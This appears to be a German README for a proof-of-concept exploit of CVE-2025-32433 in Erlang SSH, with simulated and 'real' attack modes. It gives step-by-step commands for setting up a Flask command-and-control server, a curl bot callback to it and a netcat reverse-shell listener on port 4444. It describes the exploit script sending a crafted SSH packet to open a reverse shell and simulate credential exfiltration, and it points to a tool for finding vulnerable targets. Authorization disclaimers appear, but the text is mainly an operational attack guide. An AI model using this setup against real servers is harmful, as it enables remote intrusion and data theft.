
Proof-of-Concept-Exploit für CVE-2025-32433 mit simulierten und echten Angriffsmodi, einschließlich eines Flask-basierten C2-Servers für Reverse-Shell-Callbacks und Post-Exploitation-Simulation.
Dieses Repository enthält Code, der eine echte CVE (CVE-2025-32433) demonstriert.
Verwenden Sie es nur in Umgebungen, in denen Sie eine ausdrückliche Genehmigung haben.
Testen Sie diesen Exploit niemals gegen Systeme, die Sie nicht besitzen oder verwalten.
Unbefugte Nutzung ist illegal, unethisch und schädlich für die Cybersicherheitsgemeinschaft.
Simulierter und echter PoC für CVE-2025-32433
Mein Kumpel Chocapikk zeigte mir diesen gefundenen PoC erling_cve.py. Ich war neugierig und wollte ihn in einer sicheren Umgebung testen.
Du hast zwei Möglichkeiten mit diesem Repo: das sichere simulierte Skript und System, das ich unten beschreibe, oder du kannst das echte erling_cve.py verwenden (ethisch, mit Vorsicht und nur in Netzwerken, für die du eine Testgenehmigung hast).
Bevor du dieses Tool verwendest, um einen tatsächlichen Exploit zu testen oder auszuführen, schau dir meinen Kumpel m0usemm0use und sein Python-Skript an, um anfällige Ziele von CVE-2025-32433 zu finden!!!!
https://github.com/m0usem0use/erl_mouse
SIMULIERTE Version des Exploits für CVE-2025-32433
Einrichtung des C2-Servers
Erstelle einen Python-Flask-basierten C2: leistungsstark für Bot-Callbacks oder Reverse Shells.
Führe dieses Setup-Skript auf dem C2-Server aus
apt update && apt install python3-pip git -y
sudo apt install python3-flask
mkdir ~/c2
cd ~/c2
nano c2_server.py (füge das c2_server-Skript ein und bearbeite es nach Bedarf)
ausführen
python3 c2_server.py
Bots (oder Testskripte) können sich so anmelden
curl -X POST http://:8080/report -d "Bot is online"
Einrichtung einer Python-Venv auf Kali
mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab
Erstelle eine virtuelle Python-Umgebung
python3 -m venv venv
source venv/bin/activate
sudo apt install python3-requests
Testen des Callbacks
nano test_callback.py (füge das test_callback-Skript ein und bearbeite es nach Bedarf)
Callback ausführen
python3 test_callback.py
Du hast jetzt offiziell
Eine funktionierende Venv
Einen Live-Cloud-C2
Funktionale Callback-Injektion
-Du benötigst, dass die Ziel-/Opfermaschine einen Erlang-Prozess oder -Dienst exponiert (oder simuliert) hat.
WAS MACHT erling_cve.py?
Verbindet zu Port 22 einer Ziel-IP
Sendet eine gefälschte SSH-Versionszeichenfolge
Sendet ein manipuliertes Paket (wahrscheinlich um eine Schwachstelle auszulösen – vorgibt, etwas wie Erlangs undokumentierten SSH-Handler oder Pufferüberlauf zu missbrauchen)
Löst eine Reverse Shell zurück zur Angreifer-IP aus
Simuliert Post-Exploitation, indem Befehle wie whoami, uname und eine gefälschte "Credential-Exfiltration" nach /tmp/exfil.log ausgeführt werden
Wir nehmen unseren gefundenen Erlang-artigen PoC und
Machen ihn innerhalb der Kali-Venv funktionsfähig
Verdrahten ihn so, dass er an unseren Cloud-C2 meldet, wenn der "Angriff" läuft
Führen ihn ethisch und sicher in einer kontrollierten Laborumgebung aus
Beobachten, wie er /tmp/exfil.log generiert, um gestohlene Daten zu simulieren
von der Kali-Maschine aus
nano poc_erlang_test.py
-füge poc_erlang_test.py ein und bearbeite es nach Bedarf
Öffne einen Listener
führe in einem neuen Terminal aus
nc -lvnp 4444
PoC ausführen
python poc_erlang_test.py --real